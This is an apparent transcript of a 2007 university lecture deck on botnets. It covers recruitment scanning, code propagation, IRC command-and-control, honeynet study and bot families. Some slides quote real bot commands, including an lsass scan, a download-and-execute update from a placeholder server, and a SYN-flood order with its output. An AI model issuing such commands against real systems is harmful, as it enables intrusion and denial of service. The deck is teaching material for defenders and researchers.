563'7'2 Bot Nets - PowerPoint PPT Presentation

1 / 19
About This Presentation
Title:

563'7'2 Bot Nets

Description:

http://honeynet.thalix.com/papers/honeynet/index.html. http://www.honeynet.org/papers/bots ... http://www.wired.com/politics/security/magazine/15-09/ff_estonia. 19. 19 ... – PowerPoint PPT presentation

Number of Views:30
Avg rating:3.0/5.0
Slides: 20
Provided by: C557
Category:
Tags: bot | nets

less

Transcript and Presenter's Notes

Title: 563'7'2 Bot Nets


1
563.7.2Bot Nets
  • Evgeni Peryshkin
  • University of Illinois
  • Fall 2007

2
What Botnets do
  • Denial of service (tribe flood trinu,
    stacheldraht, trinity)
  • Adware
  • Spyware
  • E-mail spam
  • Click fraud-or the purpose of generating a charge
    per click without having actual interest in the
    target of the ad's link
  • identity theft
  • Spreading new malware start base for e-mail
    virus

papers/bots
2
3
Creation and use
wikipedia botnet
3
4
Dramatis personae
Attacker(s)
IRC server
Handler
Handler
Agent
Agent
Agent
Victim
Agent-handler attack model
IRC-based attack model
Specht, Lee, 04
4
5
Agent Recruitment - scanning strategy
  • Random Scanning (Code Red)
  • high traffic volume of inter-network traffic -
    may aid detection
  • no coordination - increases likelihood of
    duplicate scans
  • Hit List
  • splits off pieces of the list to give to newly
    recruited machines
  • can be very fast and efficient - no collisions
  • a large list will cause more traffic, possibly
    aiding detection
  • Permutation Scanning
  • if an agent sees an already infected host, it
    chooses a new random starting point
  • if an agent sees a certain threshold number of
    infected hosts, it becomes dormant
  • Signpost Scanning
  • uses communication patterns or data found on
    newly infected hosts to select next targets
  • any email worm that spreads using address book of
    infected host
  • hard to detect based on traffic patterns
  • may be slow to spread
  • Local Subnet (code red II, nimda)

Uiuc 563.9.1 DOS attacks Classification/Taxonomy
5
6
Agent Recruitment - vulnerability scanning
  • Horizontal
  • looks for specific port/vulnerability
  • Vertical
  • look for multiple ports/vulnerabilities on the
    same host
  • Coordinated
  • scan multiple machines on the same subnet for a
    specific vulnerability
  • Stealthy
  • any of the above, but do it slowly to avoid
    detection

Uiuc 563.9.1 DOS attacks Classification/Taxonomy
6
7
Agent Recruitment - attack code propagation
  • Central Server (li0n worm)
  • all newly recruited agents contact a central
    server to get attack code
  • single point of failure
  • can be discovered and shut down
  • high load at central server may limit efficiency
    or enable detection
  • Back-chaining (ramen, morris worms)
  • attack code downloaded from machine that was used
    to exploit the new host
  • Autonomous (Code Red, Warhol, various email
    worms)
  • attack code downloaded concurrently w/exploit

Uiuc 563.9.1 DOS attacks Classification/Taxonomy
7
8
How to study bot nets
  • Create honeynet interactive honeypot
  • Data Control contain malicous activity
  • Your node
  • Data Capture store what user is doing
  • Data Analysis interpret data captured
  • Data Collection send data captured to organized
    source

papers/honeynet
8
9
How IRC controlled Bot nets grow
  • Compromise host
  • Use tftp/ftp/http/Csend to transfer itself to
    compromised host
  • Start binary, which connects to hard-coded master
    server (using dynamic DNS name)
  • Bot contact server, server send info about itself
    including features understood
  • Bot logins in to masters channel with password

papers/bots
9
10
How IRC controlled Bot nets grow 2
  • topic of the channel interprets as a command for
    bot.
  • Example advscan lsass 200 5 0 -r -s
  • Use use 200 threads to search for lsass
    vunerability every 5 seconds. s for silent to
    reduce traffic. Add more hosts to botnet.
  • Example 2".http.update http//ltservergt/mugenxu/r
    Bot.exe c\msy32awds.exe 1"
  • Download binary file and execute to update bot.
  • Generally bots dont spread unless told so.

papers/bots
10
11
How IRC controlled Bot nets grow 3
  • If requested, bot tell server of spread.
  • IRC server will provide the channels userlist.
    (channel operators to save traffic and disguise
    number bots)
  • Before commands sent controller has to
    authenticate with bots over irc channel.
  • Example .la plmp -s
  • -s no fail reply to reduce traffic

papers/bots
11
12
How IRC controlled Bot nets grow 4
  • Irc server(s) is compromised machine.
  • Flexibility of own irc server. Harder to trace to
    attacker.
  • Beginners- bot-network on original irdD
  • 1,200 clients named rbotltgt report scanning
    results. (easy to discover)
  • Top bot-net irc server Unreal IRCd and
    ConferenceRoom

papers/bots
12
13
Different kinds of Bots -popular
  • Agobot/Phatbot/Forbot/XtremBot tidy GPL c,
    tidy abstract design, modular and easy to add
    commands
  • SDBot/RBot/UrBot/UrXBot/... most active, messy
    c, GPL
  • mIRC-based Bots - GT-Bots launch mIRC
    chat-client, hidewindown executable to hide mIRC

papers/bots
13
14
Bot net size
  • Dutch police found a 1.5 million node botnet
  • Norwegian ISP Telenor disbanded a 10,000-node
    botnet
  • Of the 600 million computers currently on the
    internet, between 100 and 150 million were
    already part of these botnets, Mr Cerf said.
  • Generally 50k is large for botnet

bbc
papers/bots
14
15
Botnet vs Botnet
  • If machine part of 2 botnets, packet sniffing
    allows to gather the key information of the other
    botnet. Thus it is possible to "steal" another
    botnet.
  • Stealing is easier than building out one
  • Some actually "secure" the bot machines
  • Install patches
  • shut down open ports
  • DDOS to kidnap over bots.

Honeynet dark reading one on one
15
15
16
New Botnets
  • Shift from IRC to http/peer to peer
  • Peer to peer more popular- not centralized, bots
    forwards commands to other bots.

dark reading
17
Example DDos attack
  • FOO ltnicknamegt .scanstop
  • FOO ltnicknamegt .ddos.syn 151.49.8.XXX 21
    200
  • FOO lt-XP-18330gt DDoS Flooding
    (151.49.8.XXX21) for 200 seconds ...
    FOO lt-2K-33820gt DDoS Done with flood
    (2573KB/sec). FOO lt-XP-86840gt DDoS
    Done with flood (351KB/sec).

papers/bots
18
Lessons learned
  • Botnets stolen frequently. If get password and
    channel name, can instruct bot to upgrade to your
    botnet software. (fun to watch bot steal bots)
  • Updates frequent- one update killed botnet,
    invalid 1 char in nickname.
  • Unskilled people run botnets. (username, own
    servers, own webserver for updates)
  • often botnets are run by young males with
    surprisingly limited programming skills. ("How
    can i compile " )

papers/bots
19
Suggested Readings
  • http//honeynet.thalix.com/papers/honeynet/index.h
    tml
  • http//www.honeynet.org/papers/bots/
  • http//en.wikipedia.org/wiki/Bot_net
  • http//news.bbc.co.uk/2/hi/business/6298641.stm
  • http//www.wired.com/politics/security/magazine/15
    -09/ff_estonia

19
Write a Comment
User Comments (0)
About PowerShow.com
Home About Us Terms and Conditions Privacy Policy Presentation Removal Request Contact Us
Copyright 2024 CrystalGraphics, Inc. — All rights Reserved. PowerShow.com is a trademark of CrystalGraphics, Inc.
The PowerPoint PPT presentation: "563'7'2 Bot Nets" is the property of its rightful owner.
Do you have PowerPoint slides to share? If so, share your PPT presentation slides online with PowerShow.com. It's FREE!